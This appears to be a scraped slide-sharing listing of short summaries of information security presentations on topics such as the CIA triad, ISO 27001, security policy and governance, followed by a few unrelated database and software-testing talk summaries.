The document discusses information security and privacy in the public sector. It outlines key concepts like availability, confidentiality, privacy, and integrity of public information. It also discusses information security, ensuring data integrity, confidentiality and availability. The document then examines information privacy and policy instruments like legal/regulatory, economic, technical and information policies to enhance security. It identifies challenges like safeguarding sensitive data, protecting IT systems, and ensuring leadership credibility. The document concludes with recommendations for implementing secure and transparent government through effective policies, procedures, organizational structures and security programs.
The document discusses the history and evolution of information security. It begins with physical security controls for early mainframe computers and the need for security on the ARPANET network. Information security expanded to include data security and limiting unauthorized access. With the growth of networks and the internet, security became more complex as many interconnected systems needed to be secured. The document outlines key information security concepts and professionals involved in information security governance.
We live in a digital world in which our happiness, health, and even our lives can depend on the performance of technology. From medical equipment to cars, and home security systems to smartphones, computerized equipment plays a greater role in the human experience with each passing year.
This document provides an overview of information security. It defines information and discusses its lifecycle and types. It then defines information security and its key components - people, processes, and technology. It discusses threats to information security and introduces ISO 27001, the international standard for information security management. The document outlines ISO 27001's history, features, PDCA process, domains, and some key control clauses around information security policy, organization of information security, asset management, and human resources security.
The state of being protected against the unauthorized use of information, especially electronic data, or the measures are taken to achieve this.
"the growing use of mobile applications is posing a risk to information security"
Developing an Information Security ProgramShauna_Cox
The document discusses the components and development of an effective information security program. It outlines that an information security program is needed due to factors like regulatory requirements, sophisticated attacks, and the strategic importance of security. The key components of an effective program include executive commitment, policies and procedures, monitoring processes and metrics, governance structure, and security awareness training. The document also describes standard methodologies and outlines the typical development process of plan, implement, operate and maintain, and monitor and evaluate.
This slide provide various details regarding Information security. The Database its Advantage, Regarding DBMS, RDBMS, IS Design conderations. Various Cyber crime Techniques. Element of Information i.e Integrity, Availability , Classification of Threats. Information Security Risk Assessment. Four Stages of Risk Management. NIST Definition. Risk Assessment Methodologies. Security Risk Assessment Approach. Risk Mitigation Options. Categories of controls. Technical Controls etc.
Information security focuses on protecting valuable information that will help businesses to succeed in their strategies. Confidentiality, integrity and availability are the three basic objectives of Information Security.
For more such innovative content on management studies, join WeSchool PGDM-DLP Program: http://bit.ly/ZEcPAc
The document discusses information security and privacy in the public sector. It outlines key concepts like availability, confidentiality, privacy, and integrity of public information. It also discusses information security, ensuring data integrity, confidentiality and availability. The document then examines information privacy and policy instruments like legal/regulatory, economic, technical and information policies to enhance security. It identifies challenges like safeguarding sensitive data, protecting IT systems, and ensuring leadership credibility. The document concludes with recommendations for implementing secure and transparent government through effective policies, procedures, organizational structures and security programs.
The document discusses the history and evolution of information security. It begins with physical security controls for early mainframe computers and the need for security on the ARPANET network. Information security expanded to include data security and limiting unauthorized access. With the growth of networks and the internet, security became more complex as many interconnected systems needed to be secured. The document outlines key information security concepts and professionals involved in information security governance.
We live in a digital world in which our happiness, health, and even our lives can depend on the performance of technology. From medical equipment to cars, and home security systems to smartphones, computerized equipment plays a greater role in the human experience with each passing year.
This document provides an overview of information security. It defines information and discusses its lifecycle and types. It then defines information security and its key components - people, processes, and technology. It discusses threats to information security and introduces ISO 27001, the international standard for information security management. The document outlines ISO 27001's history, features, PDCA process, domains, and some key control clauses around information security policy, organization of information security, asset management, and human resources security.
The state of being protected against the unauthorized use of information, especially electronic data, or the measures are taken to achieve this.
"the growing use of mobile applications is posing a risk to information security"
Developing an Information Security ProgramShauna_Cox
The document discusses the components and development of an effective information security program. It outlines that an information security program is needed due to factors like regulatory requirements, sophisticated attacks, and the strategic importance of security. The key components of an effective program include executive commitment, policies and procedures, monitoring processes and metrics, governance structure, and security awareness training. The document also describes standard methodologies and outlines the typical development process of plan, implement, operate and maintain, and monitor and evaluate.
This slide provide various details regarding Information security. The Database its Advantage, Regarding DBMS, RDBMS, IS Design conderations. Various Cyber crime Techniques. Element of Information i.e Integrity, Availability , Classification of Threats. Information Security Risk Assessment. Four Stages of Risk Management. NIST Definition. Risk Assessment Methodologies. Security Risk Assessment Approach. Risk Mitigation Options. Categories of controls. Technical Controls etc.
Information security focuses on protecting valuable information that will help businesses to succeed in their strategies. Confidentiality, integrity and availability are the three basic objectives of Information Security.
For more such innovative content on management studies, join WeSchool PGDM-DLP Program: http://bit.ly/ZEcPAc
This document provides an overview of information security management based on an ISO approach. It discusses key ISO security categories and controls, including risk management, policy management, security organization management, and others. Sample organizational charts and resources for further information are also included. The document aims to help map strengths and responsibilities to different security areas.
This document provides an overview of information security basics. It discusses how information security aims to prevent unauthorized use, disclosure, alteration or substitution of electronic data through measures that ensure confidentiality, integrity and availability of information. It also outlines some key building blocks of secure systems like identification, authentication, authorization, and integrity. The document describes security processes, attacks against systems, and approaches for prevention, detection and response to security incidents.
This document provides an overview of key concepts in information security. It defines information security, why it is important for businesses, and common information security jobs. It then discusses the history of information security and introduces the CIA triad of confidentiality, integrity and availability. The document outlines the components of risk management and assessment. It also describes different types of security controls including administrative, logical/technical, and physical controls and important principles like separation of duties and least privilege. Finally, it discusses security classification of information.
This document discusses various technologies used for information security, including cloud access security brokers, adaptive access control, virtual private networks, endpoint detection and response solutions, intrusion detection and analysis systems, interactive application security testing, antivirus software, firewalls, audit data reduction, network mapping, password cracking, public key infrastructure, and vulnerability scanning systems. It defines information security as protecting information and systems from unauthorized access, use, disclosure, destruction, modification, or disruption. The conclusion states that information security is an ongoing process involving training, assessment, protection, monitoring, detection, incident response, documentation, and review.
The importance of information security nowadaysPECB
Nowadays living without access to the information of interest at any time, any place through countless types
of devices has become unimaginable. However, its security has become more important than information
access itself. In fact today information security rules the world…! Why?
The document discusses information security frameworks and principles. It introduces the CIA triad of confidentiality, integrity, and availability as key principles of information security. It also outlines standards from NIST and ISO, such as ISO 27002, that define best practices for information security management across various domains.
This document summarizes a security awareness training presentation that covered topics such as why security training is important, 21st century security threats, PCI compliance, security objectives and challenges, data classification, and security responsibilities. It provided examples of security incidents, the costs of data breaches, PCI DSS requirements, and outlined the company's security framework including defenses, controls, and challenges around excessive data retention, vulnerable infrastructure, lack of documentation and logging.
Information Security : Is it an Art or a SciencePankaj Rane
This document discusses information security and whether it is an art or a science. It begins with definitions of security and information security, focusing on protecting information systems and data. It then provides a brief history of information security, from its origins in code breaking during World War II to the increased threats in the modern internet era. The document outlines key information security concepts like confidentiality, integrity, and availability. It also discusses security services, information states, security countermeasures, and the importance of prevention, detection and response.
This document provides an introduction to information security. It defines information security and outlines its objectives, which include understanding the critical characteristics of information, the comprehensive security model, and approaches to implementation. The document discusses the history of information security and components of an effective information security system. It also describes the security systems development life cycle process and provides key information security terminology.
The document discusses information security and provides an overview of key concepts:
1) It defines information security as protecting information and systems from unauthorized access, use, disclosure, disruption or destruction. Maintaining confidentiality, integrity and availability of information are core principles.
2) Reasons for managing information security are given, including compliance with laws, protecting assets from loss, meeting business requirements and customer demands.
3) Methods for managing security are outlined, including implementing security frameworks, classifying information assets, and establishing roles and processes for ongoing security management. Continual assessment and improvement of security controls is important.
A security awareness presentation created for an audience of senior officials from MTNL (India's foremost telecom PSU). The presentation covers fundamentals of Information Security, it's evolution, present day risks from the IT and Telecom infrastructure perspective.
The document outlines an agenda for an information security essentials workshop. It discusses key topics like the principles of information security around confidentiality, integrity and availability. It also covers security governance structures, roles and responsibilities, risk management, information system controls and auditing information security. The objectives are to provide an overview of information security, describe approaches to auditing it, and discuss current trends.
This document is a slide presentation for an introduction to information security course at Illinois Institute of Technology. It begins with an overview of the course objectives and policies. It then provides a history of information security, defining key terms. It discusses approaches to implementing security through a systems development life cycle and the roles of security professionals.
The CIA Triad - Assurance on Information SecurityBharath Rao
Confidentiality, Integrity and Availability of Data are the basis for providing assurance on IS Security. This document gives a small overview of the impact of confidentiality, integrity and availability on the data and the need of securing the CIA.
The document discusses the importance of establishing a security policy for an organization. A security policy is a formal statement that outlines the organization's goals, objectives, and procedures for information security. It requires compliance, identifies consequences for non-compliance, and establishes a baseline for minimizing risk. The document outlines the key components of a security policy, including governing policies, technical policies, and guidelines. It also discusses developing a security policy through identifying issues, analyzing risks, drafting language, legal review, and deployment.
Information Security Management. Security solutions copyyuliana_mar
Information Security Management. Introduction.
By Yuliana Martirosyan,
Based on Bell G. Reggard, Information Security Management. Concepts and Practices.
A to Z of Information Security ManagementMark Conway
The purpose of information security is to protect an organisation’s valuable assets, such as information, Intellectual property, hardware, and software.
Through the selection and application of appropriate safeguards or controls, information security helps an organisation to meet its business objectives by protecting its physical and financial resources, reputation, legal position, employees, and other tangible and intangible assets.
In this A to Z I’d like to outline some of the key focus areas for organisations wishing to pursue compliance to the ISO27001 Information Security standard.
This document discusses security management practices, with a focus on information security management. It covers topics such as information classification, security policies, roles and responsibilities, risk management, and security awareness training. Specifically, it provides details on establishing an information classification process, including identifying information assets, analyzing risks, defining classifications, roles for information owners and custodians, and guidelines for classifying information and applications.
The document provides an overview of the Information Security & Risk Management domain for the CISSP certification. It discusses key topics including information security concepts, governance, risk management, information classification, and security controls. The objectives are to understand planning and securing information assets, developing security policies and procedures, conducting risk assessments, and implementing controls to ensure confidentiality, integrity and availability. New requirements for 2012 include project management knowledge and privacy compliance.
What Is Digital Asset Security. What Are the Risks Associated With It.docx.pdfSecureCurve
Security and privacy are crucial elements for protecting digital assets. As the use of technology continues to increase, so does the risk of cyber-attacks and data breaches.
This document provides an overview of information security management based on an ISO approach. It discusses key ISO security categories and controls, including risk management, policy management, security organization management, and others. Sample organizational charts and resources for further information are also included. The document aims to help map strengths and responsibilities to different security areas.
This document provides an overview of information security basics. It discusses how information security aims to prevent unauthorized use, disclosure, alteration or substitution of electronic data through measures that ensure confidentiality, integrity and availability of information. It also outlines some key building blocks of secure systems like identification, authentication, authorization, and integrity. The document describes security processes, attacks against systems, and approaches for prevention, detection and response to security incidents.
This document provides an overview of key concepts in information security. It defines information security, why it is important for businesses, and common information security jobs. It then discusses the history of information security and introduces the CIA triad of confidentiality, integrity and availability. The document outlines the components of risk management and assessment. It also describes different types of security controls including administrative, logical/technical, and physical controls and important principles like separation of duties and least privilege. Finally, it discusses security classification of information.
This document discusses various technologies used for information security, including cloud access security brokers, adaptive access control, virtual private networks, endpoint detection and response solutions, intrusion detection and analysis systems, interactive application security testing, antivirus software, firewalls, audit data reduction, network mapping, password cracking, public key infrastructure, and vulnerability scanning systems. It defines information security as protecting information and systems from unauthorized access, use, disclosure, destruction, modification, or disruption. The conclusion states that information security is an ongoing process involving training, assessment, protection, monitoring, detection, incident response, documentation, and review.
The importance of information security nowadaysPECB
Nowadays living without access to the information of interest at any time, any place through countless types
of devices has become unimaginable. However, its security has become more important than information
access itself. In fact today information security rules the world…! Why?
The document discusses information security frameworks and principles. It introduces the CIA triad of confidentiality, integrity, and availability as key principles of information security. It also outlines standards from NIST and ISO, such as ISO 27002, that define best practices for information security management across various domains.
This document summarizes a security awareness training presentation that covered topics such as why security training is important, 21st century security threats, PCI compliance, security objectives and challenges, data classification, and security responsibilities. It provided examples of security incidents, the costs of data breaches, PCI DSS requirements, and outlined the company's security framework including defenses, controls, and challenges around excessive data retention, vulnerable infrastructure, lack of documentation and logging.
Information Security : Is it an Art or a SciencePankaj Rane
This document discusses information security and whether it is an art or a science. It begins with definitions of security and information security, focusing on protecting information systems and data. It then provides a brief history of information security, from its origins in code breaking during World War II to the increased threats in the modern internet era. The document outlines key information security concepts like confidentiality, integrity, and availability. It also discusses security services, information states, security countermeasures, and the importance of prevention, detection and response.
This document provides an introduction to information security. It defines information security and outlines its objectives, which include understanding the critical characteristics of information, the comprehensive security model, and approaches to implementation. The document discusses the history of information security and components of an effective information security system. It also describes the security systems development life cycle process and provides key information security terminology.
The document discusses information security and provides an overview of key concepts:
1) It defines information security as protecting information and systems from unauthorized access, use, disclosure, disruption or destruction. Maintaining confidentiality, integrity and availability of information are core principles.
2) Reasons for managing information security are given, including compliance with laws, protecting assets from loss, meeting business requirements and customer demands.
3) Methods for managing security are outlined, including implementing security frameworks, classifying information assets, and establishing roles and processes for ongoing security management. Continual assessment and improvement of security controls is important.
A security awareness presentation created for an audience of senior officials from MTNL (India's foremost telecom PSU). The presentation covers fundamentals of Information Security, it's evolution, present day risks from the IT and Telecom infrastructure perspective.
The document outlines an agenda for an information security essentials workshop. It discusses key topics like the principles of information security around confidentiality, integrity and availability. It also covers security governance structures, roles and responsibilities, risk management, information system controls and auditing information security. The objectives are to provide an overview of information security, describe approaches to auditing it, and discuss current trends.
This document is a slide presentation for an introduction to information security course at Illinois Institute of Technology. It begins with an overview of the course objectives and policies. It then provides a history of information security, defining key terms. It discusses approaches to implementing security through a systems development life cycle and the roles of security professionals.
The CIA Triad - Assurance on Information SecurityBharath Rao
Confidentiality, Integrity and Availability of Data are the basis for providing assurance on IS Security. This document gives a small overview of the impact of confidentiality, integrity and availability on the data and the need of securing the CIA.
The document discusses the importance of establishing a security policy for an organization. A security policy is a formal statement that outlines the organization's goals, objectives, and procedures for information security. It requires compliance, identifies consequences for non-compliance, and establishes a baseline for minimizing risk. The document outlines the key components of a security policy, including governing policies, technical policies, and guidelines. It also discusses developing a security policy through identifying issues, analyzing risks, drafting language, legal review, and deployment.
Information Security Management. Security solutions copyyuliana_mar
Information Security Management. Introduction.
By Yuliana Martirosyan,
Based on Bell G. Reggard, Information Security Management. Concepts and Practices.
A to Z of Information Security ManagementMark Conway
The purpose of information security is to protect an organisation’s valuable assets, such as information, Intellectual property, hardware, and software.
Through the selection and application of appropriate safeguards or controls, information security helps an organisation to meet its business objectives by protecting its physical and financial resources, reputation, legal position, employees, and other tangible and intangible assets.
In this A to Z I’d like to outline some of the key focus areas for organisations wishing to pursue compliance to the ISO27001 Information Security standard.
This document discusses security management practices, with a focus on information security management. It covers topics such as information classification, security policies, roles and responsibilities, risk management, and security awareness training. Specifically, it provides details on establishing an information classification process, including identifying information assets, analyzing risks, defining classifications, roles for information owners and custodians, and guidelines for classifying information and applications.
The document provides an overview of the Information Security & Risk Management domain for the CISSP certification. It discusses key topics including information security concepts, governance, risk management, information classification, and security controls. The objectives are to understand planning and securing information assets, developing security policies and procedures, conducting risk assessments, and implementing controls to ensure confidentiality, integrity and availability. New requirements for 2012 include project management knowledge and privacy compliance.
What Is Digital Asset Security. What Are the Risks Associated With It.docx.pdfSecureCurve
Security and privacy are crucial elements for protecting digital assets. As the use of technology continues to increase, so does the risk of cyber-attacks and data breaches.
IJERD (www.ijerd.com) International Journal of Engineering Research and Devel...IJERD Editor
The document discusses privacy issues in cloud computing. It defines privacy and describes privacy enhancing technologies (PETs) that can help protect privacy, such as pseudonymization and federated identity management. It also discusses privacy by design, which aims to embed privacy protections directly into technologies. Ensuring privacy in cloud computing requires measures like access controls, protecting against unauthorized access/copying of data, and specifying privacy controls in agreements. Overall privacy is a major challenge for cloud computing due to issues of data governance, security, and differing international regulations.
The document outlines an information security course that covers 5 key objectives: understanding information security basics, legal and ethical issues, risk management, security standards, and technological aspects. It details 5 units that will be covered: Introduction, Security Investigation, Security Analysis, Logical Design, and Physical Design. The Introduction unit defines information security, discusses its importance for organizations, and covers concepts like the CIA triad, NSTISSC security model, securing system components, and the Systems Development Life Cycle.
The document covers security governance which seeks to mitigate risk and align security with business objectives. It discusses the impact of organizational structure on security and the roles of the CISO in understanding the business, developing security programs, ensuring compliance and reporting on security
This is a simple slide to showcase on why companies need to protect data, classify information and how Seclore IRM as a platform help you get to your targets
This document discusses security as a service (SECaaS) and security governance. It defines SECaaS as outsourcing cybersecurity to the cloud, covering data protection, network security, email security, identification, and data loss prevention. The types of SECaaS include data security, identity and access management, governance, data retention and business continuity planning, and legal compliance. Benefits of SECaaS include access to latest security software and experts, reasonable costs, and facilitated security administration. Security governance is defined as the tools, roles, processes, metrics, and oversight that provide formalized risk management, including access control policies, data classification, and password management. Its main purpose is overseeing cybersecurity teams to prioritize
This document discusses asset security and data classification. It provides biographies of two professionals, Jagbir Singh and Narasimhan Elangovan, who have experience in fields related to information security, risk management, and compliance. It also outlines some best practices for data management, such as creating a data policy, defining roles for data owners and custodians, and maintaining data quality standards.
Remote Access Policy Is A Normal ThingKaren Oliver
This document outlines an access control policy for a healthcare organization. It discusses the importance of access controls and audit controls for maintaining compliance with regulations like HIPAA. Authentication, authorization, and auditing are key components of access control policies. The policy also specifies that employees will only be granted the minimum level of access needed to perform their jobs and that inactive or terminated user accounts will have their access revoked in a timely manner. Role-based access control models and audit trails that track access to patient health information are important parts of the organization's compliance efforts.
Security threats and controls were discussed, including cryptography and access control. An expert trainer profile was provided, detailing qualifications and experience in IT security management and implementation of standards such as ISO 27001, COBIT 5, and ITIL. Key security concepts such as the CIA triad of confidentiality, integrity and availability were explained.
This document discusses security as a service (SECaaS) and security governance. It defines SECaaS as outsourcing cybersecurity such as data protection, network security, and database security to the cloud. Benefits of SECaaS include access to latest security software and qualified personnel at reasonable cost. The document also describes security governance as a set of tools, roles and processes for formal risk management, including access control policies, data classification, and password management. The main purpose of security governance is to oversee cybersecurity teams and prioritize risks according to business needs.
This document discusses information systems security. It begins by defining information systems and noting their importance for strategic advantage and decision making. It then discusses the risks of inadequate security management and the need to ensure integrity and safety of systems. The document goes on to explain basic principles of information security like confidentiality, integrity, availability, and others. It also discusses threats like computer crimes, accidents, vulnerabilities and methods to minimize risks like developing systems correctly, user training, physical security controls, and auditing.
The document discusses the key principles of information security - confidentiality, integrity, and availability (CIA). It provides definitions for each principle and explains their importance. For example, it states that confidentiality prevents unauthorized disclosure of information, integrity ensures accuracy and consistency of data, and availability means systems and information are accessible when needed. The document also introduces common information security concepts like identification, authentication, authorization, and accountability.
The Three Major Goals of Cybersecurity for Business Organizations-precise tes...Precise Testing Solution
In this pdf post, we’ll discuss and understand what are these three major goals of cybersecurity which every business should have to comply with in their best practices.
The document provides an overview of cyber security, including its importance, key domains and types. It discusses network security, application security, information security, identity management, operational security and other areas. It defines cyber security as protecting networks, devices, programs and data from threats. The document also covers cyber threats, vulnerabilities, cyber warfare, cyber terrorism and the need for critical infrastructure security. It provides examples and details for concepts like the CIA triad of confidentiality, integrity and availability.
Equilibrium Security Methodology 030414 Final v2marchharvey
The document discusses assessing and remediating business IT security risks. It states that traditional defenses like firewalls and antivirus software are no longer enough, and that hackers are constantly looking for vulnerabilities. It recommends conducting security assessments to identify weaknesses before hackers do. Once weaknesses are found, organizations should fix them and implement a risk-based security lifecycle of ongoing assessment, remediation, and testing to continuously monitor for new threats. Equilibrium offers IT security services to help identify vulnerabilities, design solutions, and test their effectiveness for clients.
Top Cyber Security Interview Questions and Answers 2022.pdfCareerera
Cyber security positions have considerably taken the top list in the job market. Candidates vying for elite positions in the field of cyber security certainly need a clear-cut and detailed guide to channeling their preparation for smooth career growth, beginning with getting a job. We have curated the top cyber security interview questions that will help candidates focus on the key areas. We have classified the regularly asked cyber security interview questions here, in this article into different levels starting from basic general questions to advanced technical ones.
Before we move on to the top cyber security interview questions, it is critical to reflect on the vitality of cyber security in our modern times and how cyber security professionals are catering to the needs of securing a safe cyber ecosystem.
The times we live in is defined by the digital transition, in which the internet, electronic devices, and computers have become an integral part of our daily life. Institutions that serve our daily needs, such as banks and hospitals, now rely on internet-connected equipment to give the best possible service. A portion of their data, such as financial and personal information, has become vulnerable to illegal access, posing serious risks. Intruders utilize this information to carry out immoral and criminal goals.
Cyber-attacks have jeopardized the computer system and its arrangements, which has now become a global concern. To safeguard data from security breaches, a comprehensive cyber security policy is needed now more than ever. The rising frequency of cyber-attacks has compelled corporations and organizations working with national security and sensitive data to implement stringent security procedures and restrictions.
Computers, mobile devices, servers, data, electronic systems, networks, and other systems connected to the internet must be protected from harmful attacks. Cybersecurity, which is a combination of the words "cyber" and "security," provides this protection. 'Cyber' imbibes the vast-ranging technology with systems, networks, programs, and data in the aforementioned procedure. The phrase "security" refers to the process of protecting data, networks, applications, and systems. In a nutshell,
cyber security is a combination of principles and approaches that assist prevent unwanted access to data, networks, programs, and devices by meeting the security needs of technological resources (computer-based) and online databases.
The document discusses cybersecurity governance and the role of the Chief Information Security Officer (CISO). It describes how governance seeks to exercise control and management over an organization to mitigate security risks in a proactive manner. It outlines the various roles and responsibilities in information security, including end users, administrators, security professionals, auditors, and executive management. The CISO role is responsible for developing security policies and procedures, ensuring compliance, managing the security budget, and keeping informed of emerging threats to advise the organization accordingly.
Information security involves protecting information and systems from unauthorized access, use, disclosure, disruption or destruction. It aims to ensure the confidentiality, integrity and availability of information through technical, administrative and physical controls. The most common principles of information security are confidentiality, integrity, availability, authenticity, non-repudiation and accountability. Access controls like identification, authentication and authorization help enforce security policies and protect information based on user roles and permissions. Cryptography also plays an important role through encryption to render data unusable without authorization. Information security requires an ongoing, layered approach to safeguard information throughout its lifecycle.
WFH Cybersecurity Basics Employees and Employers Dinesh O Bareja
Work from home (WFH) is the new normal. The covid19 pandemic, has thrown everyone, across the world into a struggle (and challenge) for survival. While we stand up to the challenge, we have to set our rules for WFH, with cybersecurity safeguards.
Changes in the world have brought about changes in our lives and at present there are events that are making huge changes. Cyber security demands will also change as we come out into a new world order. We look at skills needed.
Basics in IT Audit and Application Control Testing Dinesh O Bareja
IT Audit and Application Control Testing are large and complex activities in themselves, and it is my presentation to share the basics here, based on my own experience and using guidance from IIA GTAGs.
Can Cyber Insurance Enforce Change in Enterprise GRCDinesh O Bareja
Like all things cyber, insurance holds a lot of hope for risk mitigation. However, again, like all things cyber, there is a lot of unknown in the risk mitigation solution itself.
Finance and Accounting professionals to bridge the gap with ITDinesh O Bareja
The document summarizes a presentation given by Dinesh O Bareja on the role of accountancy and finance professionals in bridging the gap between IT departments and stakeholders. It discusses how accountancy and IT professionals have different but critical roles in organizations. It also outlines challenges that can arise between the two groups, such as differences in priorities and communication issues. The presentation provides recommendations on how accountancy professionals can better partner with IT, including understanding technology, participating in budget planning, and ensuring IT investments deliver value and efficiency.
Governance and IoT Cyber Risks - presented at Defcon-OWASP Lucknow, IndiaDinesh O Bareja
Internet (or Cyber) Governance has a long way to go and is presently fraught with confusion - this being a global phenomenon. Then there is the Internet of Things coming up at top speed which means that we have to face up to the risks that come with the convenience ! A solution for governance and some insight into the IoT risks were presented at the Defcon-OWASP Conference in Lucknow (India) on February 22, 2015
The document discusses poor etiquette and lack of personalization that the author has observed in LinkedIn connection requests. The author notes that many connection requests are impersonal copy-paste messages sent indiscriminately. The author believes LinkedIn connections should be managed thoughtfully rather than simply amassing thousands of connections. Quality of connections and personalizing initial messages are emphasized over quantity. The tone is one of frustration with the superficiality observed in many LinkedIn interactions.
This document outlines plans for an Information Security Education (ISE) program consisting of virtual meetings to share knowledge about infosec topics. The program aims to simplify complex infosec concepts using common language. Sessions would be one hour, with a 15-20 minute presentation followed by discussion. Topics would include cybersecurity cases, certifications, incident response, and emerging issues. Presentations must be short, practical, and focus on one topic. The goal is for ISE to become a major infosec knowledge repository in simple terms globally through local presenters and translations.
Common sense is the most important element in Information Security and I am working in the IS domain! So who knows this better than me. The problem is the people (generally) and so many IS clients and professionals do not realize this simple fact.
I am prompted by this knowledge and realization gap to present Common Sense 101 - a compilation of CS resources from all over the net - hoping it makes sense to you and you benefit from it in your practice.
Governance in Cybercrime and Cybersecurity orgns - final distribution Organiz...Dinesh O Bareja
Cybersecurity and cybercrime organizations must be created with great planning but that is not happening anywhere. In India we have a plethora of organizations sprouting up in every domain and we all know too many cooks spoil the broth. I make a case for governance at the national and state level and make the case for having a planned structure that will ensure good security, good response and offense too, if needed.
Cyberwar, cyberwarfare are on everyone's lips but mean nothing as they are least understood and still need to be defined! Yet we have everyone who means something - standing on the rooftops and rattling their swords. The question is = is India ready - this is explored in the presentation. Indian institutions, cyber practices and the way ahead.
This document provides an overview of an incident response presentation on the topic of "Incident Response Requires Superhumans". It discusses how expectations for incident response have grown exponentially with technology advancement. It outlines some of the multi-faceted skills and expertise required of incident response professionals, including deep technical knowledge across many domains as well as soft skills like communication and working under pressure. The document cautions that developing capable incident response teams is challenging due to the hands-on experience required and calls for continuous learning to address the dynamic nature of the field.
Managing Frequently Overlooked Risks & Threats (FORTS) in CorporationsDinesh O Bareja
There are many (small) risks and threats which are frequently overlooked in an organization. The presentation takes a look at where Risks & Threats (RaT) come from and at the "Biggies" in the RaT Lists. We look at a few Frequently Overlooked Threats and Risks (FORT) and Course Correction Options and finally a few Case Studies to highlight FORTs
Bug bounty program offer numerous benefits to the sponsoring companies. Government organizations as well as private organizations will benefit if they have bug hunters sniffing around on their network.
The document discusses several issues relating to information security awareness and training. It notes that awareness and training have different objectives and should be treated differently. Living in denial of security risks is common, but can leave organizations over-protected or under-protected. An inadequate response to security incidents can be chaotic with too many people involved and little learning. Indian wisdom emphasizes creating a practical security environment and following plans and policies, rather than crossing limits.
India Top5 Information Security Concerns 2013Dinesh O Bareja
Indian Information Security scenario, and the global one too, leaves much to be desired - this report covers concerns about InfoSec in this year. A straightforward document with lots of practical insights about what ails Information and Data Security in Government, Business and Users.
Information Security Management Education Program - Concept Document Dinesh O Bareja
The document proposes an information security management program to train future security managers. It notes shortcomings in existing education and certification programs. The proposed program would [1] provide practical skills training using real-world scenarios, [2] cover technical, business, audit and legal topics to prepare students for security leadership roles, and [3] include soft skills development and fieldwork opportunities. The program differentiators include an experiential learning lab, partnerships with industry, and mentoring to support career placement.
The document discusses internet security in India. It summarizes that while the internet provides many benefits, it also enables many security threats. The Open Security Alliance (OSA) conducted research on internet security issues facing individual users, organizations, and the government in India. OSA categorized internet users and identified security issues for each group. Their analysis found that India faces unique technology risk issues with a growing internet user population in both urban and rural areas. Proactive strategies are needed to establish security standards and practices through research, education and policy changes.
"Choosing proper type of scaling", Olena SyrotaFwdays
Imagine an IoT processing system that is already quite mature and production-ready and for which client coverage is growing and scaling and performance aspects are life and death questions. The system has Redis, MongoDB, and stream processing based on ksqldb. In this talk, firstly, we will analyze scaling approaches and then select the proper ones for our system.
How information systems are built or acquired puts information, which is what they should be about, in a secondary place. Our language adapted accordingly, and we no longer talk about information systems but applications. Applications evolved in a way to break data into diverse fragments, tightly coupled with applications and expensive to integrate. The result is technical debt, which is re-paid by taking even bigger "loans", resulting in an ever-increasing technical debt. Software engineering and procurement practices work in sync with market forces to maintain this trend. This talk demonstrates how natural this situation is. The question is: can something be done to reverse the trend?
Freshworks Rethinks NoSQL for Rapid Scaling & Cost-EfficiencyScyllaDB
Freshworks creates AI-boosted business software that helps employees work more efficiently and effectively. Managing data across multiple RDBMS and NoSQL databases was already a challenge at their current scale. To prepare for 10X growth, they knew it was time to rethink their database strategy. Learn how they architected a solution that would simplify scaling while keeping costs under control.
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdfChart Kalyan
A Mix Chart displays historical data of numbers in a graphical or tabular form. The Kalyan Rajdhani Mix Chart specifically shows the results of a sequence of numbers over different periods.
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectorsDianaGray10
Join us to learn how UiPath Apps can directly and easily interact with prebuilt connectors via Integration Service--including Salesforce, ServiceNow, Open GenAI, and more.
The best part is you can achieve this without building a custom workflow! Say goodbye to the hassle of using separate automations to call APIs. By seamlessly integrating within App Studio, you can now easily streamline your workflow, while gaining direct access to our Connector Catalog of popular applications.
We’ll discuss and demo the benefits of UiPath Apps and connectors including:
Creating a compelling user experience for any software, without the limitations of APIs.
Accelerating the app creation process, saving time and effort
Enjoying high-performance CRUD (create, read, update, delete) operations, for
seamless data management.
Speakers:
Russell Alfeche, Technology Leader, RPA at qBotic and UiPath MVP
Charlie Greenberg, host
"What does it really mean for your system to be available, or how to define w...Fwdays
We will talk about system monitoring from a few different angles. We will start by covering the basics, then discuss SLOs, how to define them, and why understanding the business well is crucial for success in this exercise.
Conversational agents, or chatbots, are increasingly used to access all sorts of services using natural language. While open-domain chatbots - like ChatGPT - can converse on any topic, task-oriented chatbots - the focus of this paper - are designed for specific tasks, like booking a flight, obtaining customer support, or setting an appointment. Like any other software, task-oriented chatbots need to be properly tested, usually by defining and executing test scenarios (i.e., sequences of user-chatbot interactions). However, there is currently a lack of methods to quantify the completeness and strength of such test scenarios, which can lead to low-quality tests, and hence to buggy chatbots.
To fill this gap, we propose adapting mutation testing (MuT) for task-oriented chatbots. To this end, we introduce a set of mutation operators that emulate faults in chatbot designs, an architecture that enables MuT on chatbots built using heterogeneous technologies, and a practical realisation as an Eclipse plugin. Moreover, we evaluate the applicability, effectiveness and efficiency of our approach on open-source chatbots, with promising results.
This talk will cover ScyllaDB Architecture from the cluster-level view and zoom in on data distribution and internal node architecture. In the process, we will learn the secret sauce used to get ScyllaDB's high availability and superior performance. We will also touch on the upcoming changes to ScyllaDB architecture, moving to strongly consistent metadata and tablets.
Must Know Postgres Extension for DBA and Developer during MigrationMydbops
Mydbops Opensource Database Meetup 16
Topic: Must-Know PostgreSQL Extensions for Developers and DBAs During Migration
Speaker: Deepak Mahto, Founder of DataCloudGaze Consulting
Date & Time: 8th June | 10 AM - 1 PM IST
Venue: Bangalore International Centre, Bangalore
Abstract: Discover how PostgreSQL extensions can be your secret weapon! This talk explores how key extensions enhance database capabilities and streamline the migration process for users moving from other relational databases like Oracle.
Key Takeaways:
* Learn about crucial extensions like oracle_fdw, pgtt, and pg_audit that ease migration complexities.
* Gain valuable strategies for implementing these extensions in PostgreSQL to achieve license freedom.
* Discover how these key extensions can empower both developers and DBAs during the migration process.
* Don't miss this chance to gain practical knowledge from an industry expert and stay updated on the latest open-source database trends.
Mydbops Managed Services specializes in taking the pain out of database management while optimizing performance. Since 2015, we have been providing top-notch support and assistance for the top three open-source databases: MySQL, MongoDB, and PostgreSQL.
Our team offers a wide range of services, including assistance, support, consulting, 24/7 operations, and expertise in all relevant technologies. We help organizations improve their database's performance, scalability, efficiency, and availability.
Contact us: info@mydbops.com
Visit: https://www.mydbops.com/
Follow us on LinkedIn: https://in.linkedin.com/company/mydbops
For more details and updates, please follow up the below links.
Meetup Page : https://www.meetup.com/mydbops-databa...
Twitter: https://twitter.com/mydbopsofficial
Blogs: https://www.mydbops.com/blog/
